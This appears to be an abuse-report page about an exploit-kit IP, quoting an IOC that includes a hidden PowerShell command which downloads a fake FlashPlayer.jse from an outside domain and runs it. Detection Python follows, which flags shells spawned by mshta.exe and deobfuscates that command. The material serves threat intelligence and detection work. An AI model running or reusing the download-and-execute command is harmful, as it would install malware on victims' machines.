On 2018-02-05 17:33:14 UTC, suspect-networks.io received the following abuse complaint from DTR on the IP address 23.227.196.139.


IP address: 23.227.196.139
Reporter: DTR
Reported at: 2018-02-05 17:33:14 UTC
Category: exploit kit
Below is payload information originating from Swiftway IP address 23.227.196.139, which has the domain name ui6eivinahost.org, registered under Alan Mason.

Process Name: powershell.exe
Process MD5: 852D67A27E454BD389FA7F02A8CBE23F
IOC Event Timestamp: 2018-02-05T04:35:29.993Z
Path: c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+[char][byte]92+'1517805326442.js';(New-Object System.Net.WebClient).DownloadFile('http'+'s://ui6eivinahost.org/2923218811894/1517804428259437/FlashPlayer.jse',$d);Invoke-Item $d;
IOC Query String: ((process_name:cmd.exe OR process_name:powershell.exe) parent_name:mshta.exe)
Event Received Timestamps: 2018-02-05T04:40:07.540Z, 2018-02-05T04:40:07.540Z
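The IOC query above keys on a shell (cmd.exe or powershell.exe) whose parent is mshta.exe, and the quoted command line hides its download URL behind 'http'+'s://' string concatenation and builds the drop path with [char][byte]92 (a backslash). The following Python is an added example of running that parent/child rule over process events and recovering the URL and dropped file from the command line; it is not code from DTR's report or from suspect-networks.io. The ProcessEvent field names are assumed (they mirror the query's process_name and parent_name), the second and third sample events are constructed, and the first sample event is the command line quoted in the report.

```python
import re
from dataclasses import dataclass, field
from typing import List


@dataclass
class ProcessEvent:
    """Hypothetical EDR process record; field names follow the IOC query
    (process_name, parent_name). Real telemetry uses its own schema."""
    timestamp: str
    process_name: str
    parent_name: str
    command_line: str


@dataclass
class Finding:
    timestamp: str
    process_name: str
    urls: List[str] = field(default_factory=list)
    dropped_files: List[str] = field(default_factory=list)
    executes_dropped: bool = False


SHELLS = {"cmd.exe", "powershell.exe"}


def matches_mshta_shell_rule(ev: ProcessEvent) -> bool:
    """((process_name:cmd.exe OR process_name:powershell.exe) parent_name:mshta.exe)"""
    return (ev.process_name.lower() in SHELLS
            and ev.parent_name.lower() == "mshta.exe")


_CHARCODE = re.compile(r"\[char\](?:\[byte\])?(\d+)", re.IGNORECASE)
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def deobfuscate(cmdline: str) -> str:
    """Resolve [char][byte]NN / [char]NN casts to the character they produce
    and fold 'a'+'b' string concatenation into 'ab', repeating until stable."""
    out = _CHARCODE.sub(lambda m: chr(int(m.group(1))), cmdline)
    prev = None
    while prev != out:
        prev = out
        out = _CONCAT.sub(r"'\1\2'", out)
    return out


_URL = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
# A bare script file name in quotes (no path separators), so the remote
# FlashPlayer.jse inside the URL is not reported as a local drop.
_SCRIPT_FILE = re.compile(r"'([^'/\\]+\.(?:jse?|vbs|vbe|hta|wsf))'", re.IGNORECASE)
# Execution of the downloaded file through a variable, e.g. "Invoke-Item $d".
_EXEC = re.compile(r"\b(?:Invoke-Item|Start-Process)\b\s+\$\w+", re.IGNORECASE)


def analyze(events: List[ProcessEvent]) -> List[Finding]:
    """Apply the parent/child rule, then enrich each hit from its command line."""
    findings = []
    for ev in events:
        if not matches_mshta_shell_rule(ev):
            continue
        clean = deobfuscate(ev.command_line)
        findings.append(Finding(
            timestamp=ev.timestamp,
            process_name=ev.process_name,
            urls=_URL.findall(clean),
            dropped_files=_SCRIPT_FILE.findall(clean),
            executes_dropped=bool(_EXEC.search(clean)),
        ))
    return findings


def sample_events() -> List[ProcessEvent]:
    """Constructed test data: the first record is the command line from the
    report above; the other two are made up to exercise the rule."""
    reported = (
        '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -WindowStyle Hidden '
        "$d=$env:temp+[char][byte]92+'1517805326442.js';"
        "(New-Object System.Net.WebClient).DownloadFile('http'+'s://ui6eivinahost.org/"
        "2923218811894/1517804428259437/FlashPlayer.jse',$d);Invoke-Item $d;"
    )
    return [
        ProcessEvent("2018-02-05T04:35:29.993Z", "powershell.exe", "mshta.exe", reported),
        # Benign: an interactive shell launched from Explorer does not match.
        ProcessEvent("2018-02-05T05:00:00.000Z", "powershell.exe", "explorer.exe",
                     "powershell.exe -NoProfile Get-ChildItem C:\\Users"),
        # Matches the rule but carries no download stage.
        ProcessEvent("2018-02-05T05:10:00.000Z", "cmd.exe", "mshta.exe",
                     "cmd.exe /c whoami"),
    ]


if __name__ == "__main__":
    for f in analyze(sample_events()):
        print(f)
```

The rule matches on lineage alone, so the third sample (cmd.exe under mshta.exe with no download stage) still fires; in environments where mshta.exe legitimately launches scripts, the URL and dropped-file enrichment is what separates a dropper from noise, and the recovered URL and %TEMP% file name are the artifacts to block and hunt for.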